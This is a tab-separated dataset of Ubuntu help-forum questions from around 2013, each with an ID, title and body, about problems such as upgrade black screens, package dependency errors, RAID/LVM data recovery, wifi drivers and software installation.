271011	black screen on boot after upgrade to 12.10 from 12.04 ?	new to ubuntu but loving it already . i am not a ubuntu genius , but i am quite computer competent and just need a little help to get past this issue ! earlier today , i downloaded the ubuntu 12.10 ( both 32 and 64 bit ) and tried to install them from a usb boot . unfortunately , each time i did so i would get this error : syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h. peter anvin et al . bit of a weird error as no matter what i tried from solutions i found on here , nothing seemed to work . anyway , what i decided to do was download ubuntu 12.04 lts , burn it to a cd and boot from the cd to perform a clean install ( erasing windows etc ) ubunutu 12.04 was then running perfectly . i install all the updates and i was ready to go . i then decided i might as well upgrade ( via software updates ) to 12.10 after hitting upgrade , all was going well and it seemed to finish the installation . it asked for a reboot , so i allowed it to reboot . here 's where it went wrong : on the reboot , the ubunutu logo would show ( splash screen ? ) with all of the dots colours red ( as if it was loading ) and then the screen flickered , the backlight turned off , turned back on again to display a complete black screen ( with the backlight on ) i did try some solutions ( booting into grub , pressing 'e ' , removing 'quick and splash from the linux line ) i tried : sudo apt-get update sudo apt-get upgrade etc and yet i would still have the black screen . i have reinstalled 12.04 for the time being , but would really like to install 12.10 , but do n't want to go through all the hassle again of having to reinstall 12.04 if it doesnt work again ! any ideas why i 'm getting this black screen and how i can fix it/ upgrade to 12.10 a different way ? thanks guys peace ! x
271012	no operating system or formatted partition ( s ) on laptop	i have about 20 ibm lenovo thinkpad laptops , r52 , that are being donated to a school in the dominican repulic . there is absolutely nothing on them ! i am trying to load ubuntu mint on them and have it installed on one of the laptops , from a cd that i burned with the software and during the setup , step 4 of 8 , ( prepare partitions ) it got stuck . there is nothing listed there so i went to the terminal and got the gparted software but when i sudo lshw -c disk , it only lists *-cdrom . i used the sfdisk command and try using the menu options , nothing works . does that mean the hard drive is n't formatted at all and that is why ubuntu ca n't see it ? i am not a programmer , just thought this was the best option for these laptops . any advice you can give me on formatting the partitions would be highly appreciated . please share step by step with me in the linux language .
271015	how can i change the owner of a folder ?	i am an emigrant from windows but i am having a serious problem which is changing the root permission . i tried to changed the owner by doing right click and change the permission but it 's not working . can any one help me to move these folder ?
271017	package dependencies errors ?	i have some problems with lubuntu . when i tried sudo apt-get update : fetched 1,222 kb in 7s ( 171 kb/s ) reading package lists ... done yana @ yana-lubuntu : ~ $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : chromium-browser : depends : chromium-codecs-ffmpeg ( > = 0.6 ) but it is not installed or chromium-codecs-ffmpeg-extra ( > = 0.6 ) but it is not installed recommends : chromium-browser-l10n but it is not installed e : unmet dependencies . try using -f. yana @ yana-lubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : chromium-codecs-ffmpeg the following new packages will be installed : chromium-codecs-ffmpeg 0 upgraded , 1 newly installed , 0 to remove and 10 not upgraded . need to get 0 b/475 kb of archives . after this operation , 1,867 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package chromium-codecs-ffmpeg . dpkg : warning : files list file for package 'libxau6 : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'strace ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libatkmm-1.6-1 : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'aspell ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'openjdk-6-jre-lib ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libsasl2-modules : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libobrender27 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libidl-common ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'fonts-nanum ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libmono-system4.0-cil ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libass4 : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'libieee1284-3 : i386 ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'netbase ' missing ; assuming package has no files currently installed dpkg : warning : files list file for package 'cups-ppdc ' missing ; assuming package has no files currently installed ( reading database ... 243295 files and directories currently installed . ) unpacking chromium-codecs-ffmpeg ( from ... /chromium-codecs-ffmpeg_25.0.1364.160-0ubuntu0.12.10.1_i386.deb ) ... setting up chromium-codecs-ffmpeg ( 25.0.1364.160-0ubuntu0.12.10.1 ) ... yana @ yana-lubuntu : ~ $ sudo apt-get autoremove reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 10 not upgraded . and maybe it is related - flash not working on chromium and i have red icon in panel : a problem occurred when checking for the updates and the power off button , in my physical system block and in lubuntu it does n't work . i can restart my pc only from a tty ctrl+alt+f1 and then ctrl+alt+del and during restart hold physical power-off button on system block . or type sudo poweroff in terminal . perhaps all of these problems have a common cause .
271027	recover data on external drive	i lost all my data on an external hard driven and need help getting it back . i first installed ubuntu 12.04 64bit in dual boot along side windows 7 64 , then i updated and installed all the programs that i wanted . i then wanted to create a backup , so i went in the terminal ( on live boot cd ) and i cloned my 250 gig hard drive partition onto my much larger 1tb external hard drive . well the dd did a good job and created a 250 gig partition on my drive , but now all my data is gone . when i look at the hard drive in windows , it says there are 3 partitions , one smaller partition , one cloned drive partition , and about 700gigs of unallocated space . i looked on the internet for solutions , and i followed some instructions to use testdisk to locate missing files . on test disk , i selected create new log file , then i selected my 1tb hard drive , then i selected intel and went quick search . no results displayed . i then did deep search and let that run from 0 % to 100 % . i was able to see only the files of the partitioned portion . there was a few non ntfs folders displayed as linux , but i could not see any files in them it only said something about corruption and can not display or something like that . long story short , i scanned my driver two times which took about 6 hours . is there a way i can still get my information back ?
271028	killall does n't kill all and rarely kills , what is the command for then ?	i occasionally use the killall command to kill processes . the reason why i say ocassionally is that in some cases it has n't worked for me . a recent example was with thunderbird where there were about 5 instances in memory so i decided to use the killall command . it killed 2 processes and 3 were still left in memory . tried again and the 3 were still there . so i manually used the kill -9 command to kill each of the individual processes via their pids . that worked . i mostly use the kill -9 command as it works . the killall command has let me down so many times i just do n't bother using it . but there must be a reason why it does n't work . am i using it wrong ? i know there are other commands like pkill but i would be grateful to understand why the killall command does n't work as expected . i have even tried to kill just one process and it is a hit and miss affair . but the kill -9 command works every time . any ideas ? ps : sudo does n't make a difference
271031	i ca n't find my hard drive to make a backup of it	2 weeks ago my computer stopped working . i thought it was n't going to work anymore but i heard about ubuntu and i burned it in a dvd and try to restore or `` backup '' all my files and my information which is so valuable . is there a way to do it ? thank you !
271034	what does this command mean ls -l test.conf -rw-r -- r -- l root root ?	root @ ubuntu : /etc/openvpn # ls -l test.conf -rw-r -- r -- l root root 791 mar 20 09:23 test.conf what does the above command mean ?
271037	the `` man '' pages are not very well laid out or even helpful at times , alternatives ?	i always thought of writing a bash utility called realman which would explain commands like in the man pages but instead of laying out the commands in alphabetical order by the options the command has , it would simply just give examples the average user would need . some commands do give examples but as the man pages are constructed by different people there is no central control on what a man page should look like readability wise . take a description of man as an example name man - an interface to the on-line reference manuals synopsis man [ -c file ] [ -d ] [ -d ] [ -- warnings [ =warnings ] ] [ -r encoding ] [ -l locale ] [ -m system [ , ... ] ] [ -m path ] [ -s list ] [ -e extension ] [ -i|-i ] [ -- regex| -- wildcard ] [ -- names-only ] [ -a ] [ -u ] [ -- no-subpages ] [ -p pager ] [ -r prompt ] [ -7 ] [ -e encoding ] [ -- no-hyphenation ] [ -- no-justification ] [ -p string ] [ -t ] [ -t [ device ] ] [ -h [ browser ] ] [ -x [ dpi ] ] [ -z ] [ [ section ] page ... ] ... man -k [ apropos options ] regexp ... man -k [ -w|-w ] [ -s list ] [ -i|-i ] [ -- regex ] [ section ] term ... man -f [ whatis options ] page ... man -l [ -c file ] [ -d ] [ -d ] [ -- warnings [ =warnings ] ] [ -r encoding ] [ -l locale ] [ -p pager ] [ -r prompt ] [ -7 ] [ -e encoding ] [ -p string ] [ -t ] [ -t [ device ] ] [ -h [ browser ] ] [ -x [ dpi ] ] [ -z ] file ... man -w|-w [ -c file ] [ -d ] [ -d ] page ... man -c [ -c file ] [ -d ] [ -d ] page ... man [ -hv ] it 's totally overkill . my man page would read ... its a program gives you more details of a command . eg . `` man bash '' would explain more about the command `` bash '' having to read through all the options of a command to find that one option that most users would use is not very constructive . so my question is simple , is there a `` realman '' type program available in ubuntu via the command line that is more user oriented as opposted to system administrator oriented ?
271039	how do i install macaulay2 in ubuntu 12.10 ?	i am trying to install macaulay2 . i am running ubuntu 12.10 . i have modified /etc/apt/sources.list as explained at the official site and followed the steps but somehow when i use synaptic package manager it says that can not load uiuc repositories . when i use apt-get i get the message that it could n't locate macaulay2 . using gdebi i get this error : dependency is not satisfiable macaulay 1.5 * i am not sure how i should go about it and any help is highly appreciated . * : i am running intel i-5 processor and the ( architecture ) dependent version seems to be i3 . but i do not think that is an issue .
271043	ncaa march madness live does n't work	ncaa march madness live is a flash-based video player for the ncaa college basketball tournament that started today . in past years , it worked fine in linux , but now i get an error that says `` technical foul '' and `` v001 '' when i try to view a video . their documentation and support staff were not able to help me . i tried this on two separate computers ( both running ubuntu 12.10 ) in firefox and chrome ( ff from the default repos , chrome stable from google 's repo ) . both had the same problem . on both computers i also have a windows xp virtual machine running inside ubuntu , and march madness live works fine in the vm . so , any ideas ? i know flash is proprietary and the error message is not very revealing . has anyone at least been able to watch games in linux ? edit : just to clarify ... the ads usually do play successfully , at least in part . the basketball games have never played for me , even for a second . and while there is a place to log in with your cable/satellite tv provider account , it should give you 4 hours free without doing that . personally i have tried both logged in and not logged in ( as some other people replying here also tried ) and neither way works in linux but both ways work in windows .
271044	getting wireless to work , dell inspiron e1505 ( bcm4311 )	ok. so i know there are about a million threads on this subject already , but nothing has worked for me . about to lose my mind here , if someone can please help i will be eternally grateful . i have a dell inspiron e1505 which has a broadcom corporation bcm4311 wireless controller . i ca n't get it to work . i 've followed the steps outlined on the following sites : how can i get broadcom bcm4311 wireless working ? http : //ubuntuforums.org/showthread.php ? t=2072887 https : //help.ubuntu.com/community/wifidocs/driver/ndiswrapper and more . nothing is working , and i 'm on the verge of giving up . as a linux newbie i can only imagine i 'm missing something stupidly obvious . if someone could give me a step-by-step instruction for going from a completely fresh 12.10 install to having a working wifi connection i would be ( as mentioned earlier ) eternally grateful . please let me know if anyone needs more info .
271047	following the procedure did not result in 12.10	i used the update manager per the procedure to upgrade from 12.04 lts to 12.10 . the update manager was replaced by the software center , and i still have 12.04 lts .
271048	sync ubuntu - youtube or media	does anyone know of a way to either : sync youtube videos across multiple ubuntu desktops . sync media ( movies/music ) across multiple ubuntu desktops . ideally , one would be able to have media play throughout an entire house/flat just by linking a device in each room , which is perfect for events . this is very much like music pool for pcs . an alternative is to place long range wireless speakers in each room , but this does not provide the multiple displays/visuals . i tried using ubuntu 's shared desktop application , but it wo n't share the sound of the host machine with the client .
271049	why do i get unmet dependencies installing spotify on 12.10 ?	i followed the instructions to install spotify as on various forums & sites , pretty much the same steps everywhere . but when i get to the install spotify line , this is what happens : the following packages have unmet dependencies : spotify-client : depends : libgconf2-4 but it is not installable e : unable to correct problems , you have held broken packages . what is libgconf2-4 and how do i fix this ?
271050	my ubuntu 12.10 partition is frozen in the safe graphics mode ?	i have an acer aspire 5315 with ubuntu 12.10 on it . i had it fully customized , except for the fact that my cooling fan would n't work . after some research , i found out that the fans are run off of software . that only works with vista . so , i did a system edit of some sort , and my fan started working ! sadly , the next day , it stopped . after more research , i decided to update my bios . then , i booted it back up , and it said , '' the system is running in low-graphics mode your screen , graphics cards , and input device settings could not be detected correctly . you will need to configure these yourself . '' and it 's stuck in this mode . i can press `` enter '' and it brings up another screen , with multiple options . the kicker is , it wo n't let me choose any of them . i have no pointer , and when i try to engage in the command prompt with `` alt+ctrl+f1 '' it only shows up with a bunch of blue lines . please help me ! all my friends say that it 's the wrong driver configuration . i have no idea what to do . i am currently posting this from my linux nadia live cd .
271051	change where basket saves notebooks ?	currently i am trying to use basket but , i ca n't find the place where it lets me change where my baskets are stored . i need to keep them encrypted from prying eyes and want them located in /media/truecrypt1 . i 've searched all the menus and settings to no avail .
271053	lvm disappeared after disc replacement on raid10	here my problem : i am running ubuntu 12.04 on a raid10 ( 4 disks ) , on top of which i installed an lvm with two volume groups ( one for / , one for /home ) . the layout of the disks are as follows : disk /dev/sda : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0003f3b6 device boot start end blocks id system /dev/sda1 * 63 481949 240943+ 83 linux /dev/sda2 481950 2910640634 1455079342+ fd linux raid autodetect /dev/sda3 2910640635 2930272064 9815715 82 linux swap / solaris disk /dev/sdb : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00069785 device boot start end blocks id system /dev/sdb1 63 2910158684 1455079311 fd linux raid autodetect /dev/sdb2 2910158685 2930272064 10056690 82 linux swap / solaris disk /dev/sdc : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 63 2910158684 1455079311 fd linux raid autodetect /dev/sdc2 2910158685 2930272064 10056690 82 linux swap / solaris disk /dev/sdd : 1500.3 gb , 1500301910016 bytes 255 heads , 63 sectors/track , 182401 cylinders , total 2930277168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000f14de device boot start end blocks id system /dev/sdd1 63 2910158684 1455079311 fd linux raid autodetect /dev/sdd2 2910158685 2930272064 10056690 82 linux swap / solaris the first disk ( /dev/sda ) contains the /boot partition on /dev/sda1 . i use grub2 to boot the system off this partition . on top of this raid10 i installed two volume groups , one for / , one for /home . this system worked well , i even exchanged two disks during the last two years . it always worked . but not this time . for the first time , /dev/sda broke . i do not know if this is an issue – i know i would have struggled anyways to overcome the problem with /boot installed on that disk and grub2 installed on the mbr of /dev/sda . anyways , i did what i always did : start knoppix fire up the raid sudo mdadm -- examine -scan which returns array /dev/md127 uuid=0dbf4558:1a943464:132783e8:19cdff95 start it up sudo mdadm -- assemble /dev/md127 fail the failing disk ( smart event ) sudo mdadm /dev/md127 -- fail /dev/sda2 remove the failing disk sudo mdadm /dev/md127 -- remove /dev/sda2 stop the raid sudo mdadm -s /dev/md127 take out the disk replace it with a new one create the same partitions as on the failling one add it to the raid sudo mdadm -- assemble /dev/md127 sudo mdadm /dev/md127 -- add /dev/sda2 wait 4 hours all looks fine : cat /proc/mdstat returns : personalities : [ raid10 ] md127 : active raid10 sda2 [ 0 ] sdd1 [ 3 ] sdc1 [ 2 ] sdb1 [ 1 ] 2910158464 blocks 64k chunks 2 near-copies [ 4/4 ] [ uuuu ] unused devices : < none > and sudo mdadm -- detail /dev/md127 returns /dev/md127 : version : 0.90 creation time : wed jun 10 13:08:46 2009 raid level : raid10 array size : 2910158464 ( 2775.34 gib 2980.00 gb ) used dev size : 1455079232 ( 1387.67 gib 1490.00 gb ) raid devices : 4 total devices : 4 preferred minor : 127 persistence : superblock is persistent update time : thu mar 21 16:27:40 2013 state : clean active devices : 4 working devices : 4 failed devices : 0 spare devices : 0 layout : near=2 chunk size : 64k uuid : 0dbf4558:1a943464:132783e8:19cdff95 ( local to host microknoppix ) events : 0.4824680 number major minor raiddevice state 0 8 2 0 active sync /dev/sda2 1 8 17 1 active sync /dev/sdb1 2 8 33 2 active sync /dev/sdc1 3 8 49 3 active sync /dev/sdd1 however , there is no trace of the volume groups . rebooting into knoppix does not help restarting the old system ( i actually replugged and re-added the failing disk for that – the system begins to start , but then fails to see the / partition – no wonder if the volume group is gone ) does not help . sudo vgscan , sudo vgdisplay , sudo lvs , sudo lvdisplay , sudo vgscan –mknodes all returned no volume groups found . i am completely at a loss . can anyone tell me if and how i can recover my data ? thanks in advance !
271057	is there step by step documentation for installing apache on ubuntu ?	i need to install apache on ubuntu . which is the simplest way to accomplish this task ? is there a detailed documentation ? regards . sumo
271058	add ro quiet splash to all entries	i have ubuntu and archlinux in my computer , the boot system ( grub ) is in ubuntu . when i update grub ( grub-update ) the ubuntu entry gets the ro-quite-splash line . however the arch entry , after de uuid line , nothing is added automatically ( normally i edit the file grub.cfg and add it manually , which is very annoying ) . i wish grub did it by himself . sorry for the bad english ; )
271059	how can i order desktop icons to fit in the grid ?	i 'm often throwing files or directories to the desktop to sort them later . and every time i look at the desktop i am wondering why their icons does n't fit in rows and columns . even if i sort by name the items are still not in a row . is it possible to have a grid like the filemanager or every other os has ? ps : using 12.10
271060	is there a way to auto remount a drive without a reboot	i have an external drive that apparently wo n't automount anymore . if i did n't want to restart the machine . is there a way to automount the drive . it shows up under /dev/sdb1 if i do : fstab -l
271066	is there an application that does nested note taking ?	i 'm pulling my hair out trying to find a notebook program that lets me do nested note taking , and that has the ability to change the location of the notebooks . that seems really easy but , i 've found virtually no good note taking programs that do this . here 's a list of what i 've tried so far and why it did n't work for me . keepnote : very slow and unresponsive but it was pretty good aside from some formatting quirks . i was using this before but , the lag for doing anything was too high so i gave up using it . gnote : sticky note app , not what i needed tomboy : esentially the same as gnote , does n't let me change the location of the notes rednotebook : very confusing and does n't let me make notes that are nested more than two deep . basket : so far the best but wo n't let me change the location of the notebook , which makes it useless to me . if there is some way to do this i am missing i would love to hear it - > change where basket saves notebooks ? zim : cool , and i 'd use it but , it does n't have the depth of features i need . notecase : the closest thing i have found , i like the fact it encrypts but , the file linking feature does n't work all the time , and i need it . is there any alternatives besides these ? personally i 'd prefer basket but , it has some weird quirks . first , it only saves notebooks to ~/.kde/shae/baskets , and i do n't want these notes touching my hard drive at all . i need them to go to an encrypted volume /media/truecrypt1 . secondly , though it has fancy pgp encryption , it does n't encrypt the entire basket tree , only the first basket and , while the pgp encryption is perfect for me , this seems like a huge flaw , as you have to encrypt every note/basket attached to it by hand , meaning i have to type my 20+ character password every time . if i have to i might just run wine with onenote , even though i do not like using microsoft products .
271068	recover files from ubuntu using win 7 , and repair start-up	about 4 months ago , i installed ubuntu 12.04 via wubi onto my laptop to run alongside windows 7 . at start-up , i can select which os i would like to use . last night , i was working on two reports , and ended up writing about twenty pages between the two files . i wrote them using libreoffice writer , in case that is important . at the end of the night , i shut down my laptop as usual , saving and closing everything beforehand . when i turned my laptop on this afternoon , i tried to boot up ubuntu , but it became stuck on the purple screen that it sends you to while booting up the os . i let it sit for an hour and it still did n't get anywhere . i have n't installed or downloaded anything for about two weeks , and that was just adobe flash player . i do n't go to very many places on the internet , and i know that the couple of sites i use are safe , so i do n't know what may have caused this startup issue . however , this topic is less important . during start-up , there is nothing saying that anything is missing or corrupted . i figure i will probably have to reinstall ubuntu , but is there any way that i can repair it and not lose my files that i have ? also , if i have to reinstall , i would like to at least temporarily move the two files i was working on last night . they are the only two that i have not backed up yet . i saw a bunch of articles on this site and in a couple other places saying to install various ext2reader programs and such . i tried the four that everyone kept saying to use , but none of them actually found any files or even seemed to work . every article i found is over a year old , so i am hoping that those programs were just outdated , and someone here might know a way for me to recover those files via windows that actually works . so my two questions here would be : is there a way for me to recover my libreoffice writer files from ubuntu via win7 ? how can i repair the start-up for ubuntu , or do i have to reinstall it ?
271076	can no longer upload files to ubuntu one	suddenly none of the following respond when clicked on - upload file , new folder , share this folder & all of the 'more ' icons that gives the user further options for each uploaded file . all the 'buttons ' such as dashboard work fine , as does clicking on an uploaded file for download . this happens with firefox , chromium & opera and i have been unable to find another website that suffers similarly . this has always worked without a problem till now .
271081	how can i remove the `` gnome desktop environment '' entry from my login screen after uninstalling gnome ?	i installed the gnome desktop environment , with extra components , but i did n't like it , so i uninstalled it . but now at the login screen , besides the password box there 's still the button to choose unity , gnome and gnome basic or something like that . how can i completely remove it ?
271084	gnome 3 and right click menus	this is weird . but , i have a problem with gnome 3 and right clicking . all the menus look weird . they look like as if i 'm in high contrast mode . which i am not in . you ca n't see the text , only the whites of the box . this is only fixed when i go back to gnome classic , or unity .
271089	mounting udf hard drive partition at boot	how do i get a udf hard drive partition to mount at boot ? from what i can figure , mountall runs before the udf module loads . specifically : do prereq specifications in initramfs-tools hooks only specify other hooks , or can they specify modules without hooks files ? if the answer to this is that they can specify modules i think the solution to the greater problem will be to add a conditional prereq to hooks/mountall of udf if the udf module is available . currently i have a udf partition on my hard drive specified in /etc/fstab , and boot hangs with `` drive not yet ready or not present '' . if i specify `` nobootfail '' in /etc/fstab , the boot completes without mounting the partition . since the end goal is to have the udf partition be /home , this is a problem ...
271097	launcher not coming in screen	launcher has vanished from my desktop . i can now see only the desktop icon in my screen and right click option gives me usual setting option only . please suggest what needs to be checked ? has some package got corrupted or services needs to be restarted ? before this issue came up , launcher was working fine and i was working with application download of some graphic card , vm ware , thunderbird configuration and browsing . thanks , prashant
271100	ca n't mount large external large disk ( 3tb ) on ubuntu server 12.10	when i connect with e-sata or usb for external disk , the display shows the following message : [ 534.032718 ] ata3 : exception emask 0x10 asct 0x0 serr 0x5840000 action 0xe frozen [ 534.033063 ] ata3 : irq_stat 0x00000040 , connection status changed [ 534.033403 ] ata3 : serror : { commwake linkseq trstatrns devexch } [ 24.360696 ] ata3 : exception emask 0x10 asct 0x0 serr 0x5950000 action 0xe frozen [ 24.360708 ] ata3 : irq_stat 0x00000040 , connection status changed [ 24.360717 ] ata3 : serr : { phyrdychg commwake dispar linkseq trstatrns devexch } [ 30.084024 ] ata3.00 : revalidation failed ( errno=-5 ) **fdisk can found the external disk , and i use parted seted . but using mount disk , shows the following message : message , ca n't mount disk** [ 873.367903 ] ext3-fs error ( device sdb1 ) : ext3_check_descriptors : block bitmap for group 320 not in group ( block 540385280 ) ! [ 873.369151 ] ext3-fs ( sdb1 ) : error group descriptors corrupted mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg|tail or so
271108	intalling ubuntu with windows 8 on 32 bit system with uefi	hp530 model , 2007 make , with 32 bit processor ( dual core t2400 by intel ) , 945 chipset , and pre-installed vista . i upgraded vista to win8 pro and left 9gb free for installation of ubuntu . it is safer to assume that win8 is using uefi . the solution for installing ubuntu requires use of 64 bit version , whereas the processor supports only 32 bit . let me know whether i can use the 64 bit version and install it on my 32 bit system , if not , then the solution is not applicable for my system . let me know the solution for 32 bit . i can wait for future version like ubuntu 13.04 if the matter is expected to be resolved by the new version . uninstalling win8 and reinstalling it in legacy mode is not an option for me . this portion was added in response to suggestions : the boot info url is http : //paste.ubuntu.com/5636872/
271109	xubuntu installation using wubi fails	i 'm trying to install xubuntu using wubi , however , once i start the installer , it runs all the way through ( on the installing ubuntu-12.10amd 64 page with the two loading bars ) , and it gets to `` remaining time approximately 0s '' . then , it gives me an error in a message box : an error occured : error executing command command+c : \windows\sysnative\bcdedit.exe/set { a687fade-abcc-11e1-8095-e09fff5d0ff } device partiton=e : retval=1 stderr=an error has occured setting ... ... stdout= ... ... .
271112	how to configure jdbc , tomcat for eclipse ide on my ubuntu 12.04	i got an eclipse ide on my client 's machine . he needs to configure jdbc , and tomcat on this ide to use for his java projects . kindly help . he got mysql installed right now .
271113	running applications as different users	can we run the same application under different users ? ex : app1 running under both /home/usr1/app1 and /home/usr2/app1 on a linux platform ? can we have same uid for two different users ? ex : /home/usr1/app1 and /home/usr2/app2 i.e usr1 and usr2 having same uid ? ? if yes then how to do it ? can an application switch from one user to another , e.g. , app1 running under /home/usr1 can switch to /home/usr2
271117	node throw err ; typeerror : undefined is not a function ubuntu 12.04	i have installed node v0.10.1 but now when i run bower install i got this error : bower extracting /tmp/bower-bootstrap-233205yl5tjk/index.zip /usr/local/lib/node_modules/bower/node_modules/tmp/lib/tmp.js:219 throw err ; ^ typeerror : undefined is not a function at until.pullstream._flush ( /usr/local/lib/node_modules/bower/node_modules/unzip/node_modules/pullstream/pullstream.js:112:5 ) at until. < anonymous > ( _stream_transform.js:131:12 ) at until.g ( events.js:175:14 ) at until.eventemitter.emit ( events.js:117:20 ) at finishmaybe ( _stream_writable.js:332:12 ) at endwritable ( _stream_writable.js:339:3 ) at until.writable.end ( _stream_writable.js:326:5 ) at /usr/local/lib/node_modules/bower/node_modules/unzip/lib/parse.js:282:25 at process._tickcallback ( node.js:415:13 ) so i did some googling and find out that i need to install node v0.8 instead of v0.10 . how can i do that , because when i run this : $ aptitude show node package : node state : not installed version : 0.3.2-7.1 priority : optional section : universe/hamradio maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : i386 uncompressed size : 299 k depends : libax25 ( > = 0.0.11 ) , libc6 ( > = 2.7 ) , zlib1g ( > = 1:1.1.4 ) , update-inetd , openbsd-inetd | inet-superserver description : amateur packet radio node program the node program accepts tcp/ip and packet radio network connections and presents users with an interface that allows them to make gateway connections to remote hosts using a and this : $ aptitude show nodejs package : nodejs state : installed automatically installed : yes version : 0.6.12~dfsg1-1ubuntu1 priority : extra section : universe/web maintainer : ubuntu developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : i386 uncompressed size : 2,473 k depends : libc-ares2 ( > = 1.7.3 ) , libc6 ( > = 2.6 ) , libev4 ( > = 1:4.04 ) , libgcc1 ( > = 1:4.1.1 ) , libssl1.0.0 ( > = 1.0.1 ) , libstdc++6 ( > = 4.1.1 ) , libv8-3.7.12.22 , zlib1g ( > = 1:1.1.4 ) conflicts : node description : node.js event-based server-side javascript engine node.js is similar in design to and influenced by systems like ruby 's event machine or python 's twisted . it takes the event model a bit further - it presents the event loop as a language construct instead of as a library . node.js is bundled with several useful libraries to handle server tasks : system , events , standard i/o , modules , timers , child processes , posix , http , multipart parsing , tcp , dns , assert , path , url , query strings . homepage : http : //nodejs.org/ so how can i install node v0.8 . thanks in advance .
271120	convert rpm to deb failed install maya	when i use alien convert rpm to deb , it does n't work . here is feedback . maya version : hotfix4 ubuntu : 11.10 lang=c rpm -qp -- queryformat % { name } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { version } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { release } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { arch } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { changelogtext } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { summary } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { description } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { prefixes } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { postin } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { postun } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { preun } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { license } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qp -- queryformat % { prein } 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qcp 'maya2012_0_64-2012.0-499.x86_64.rpm' rpm -qpi 'maya2012_0_64-2012.0-499.x86_64.rpm' lang=c rpm -qpl 'maya2012_0_64-2012.0-499.x86_64.rpm' mkdir - chmod 755 - rpm2cpio maya2012_0_64-2012.0-499.x86_64.rpm | lzma -t -q > /dev/null 2 > & 1 rpm2cpio maya2012_0_64-2012.0-499.x86_64.rpm | ( cd - ; cpio -- extract -- make-directories -- no-absolute-filenames -- preserve-modification-time ) 2 > & 1 chmod 755 -/./ chmod : invalid option -- '/' try chmod -- help ' for more information . mkdir -/debian mkdir : invalid option -- '/' trymkdir -- help ' for more information . mkdir -/debian failed : at /usr/share/perl5/alien/package/deb.pm line 299. find - -type d -exec chmod 755 { } ; rm -rf -
271123	how can i turn off the nvidia splash on startup ?	i 'm using nvidia-current and i know it 's not a big deal . but is it possible to disable to nvidia splash on startup ?
271125	copy dvd to iso : brasero and k3b reports success but fails	i started brasero and chose to copy the dvd to image file . brasero reported success . playing file in vlc , working flawlessly until unexpected exit at approx . 1 hour 28 mins 20 sec . no error message . trying the file in movie player . unexpected exit at the same time , with this message : `` an error occured . could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . '' check that all libraries and ladidah from medibuntu repo are installed . they are . repeat steps 1 through 5 . get the ppa https : //launchpad.net/~brandonsnider/+archive/cdrtools and replace wodim with cdrecord and geniosimage with mkisofs . throw out brasero and install k3b . repeat steps 1 through 5 , with k3b not brasero . ask forums for help . this question is also posted at ubuntuforums.org . how come both brasero and k3b reports success and then the iso is obviously broken ? how to fix this problem ? this problem is similar , but not identical , to this one : ripping dvd to iso - accurately thankful for any and all input . edit : tried dd if=/dev/cdrom of=image_name.iso and ddrescue -v /dev/cdrom image_name.iso both of which renders an iso file that is not playing at all . so even though faulty , both brasero and k3b performs better than cli in this case .
271128	will skype support for ubuntu be removed ?	i was curious ( and concerned ) . since microsoft has completely taken over skype , does it mean , they will stop supporting skype for ubuntu ?
271133	which version of python is installed ?	i installed ubuntu 12.10 in my virtualbox . is python installed by default ? if not , how can i install python ?
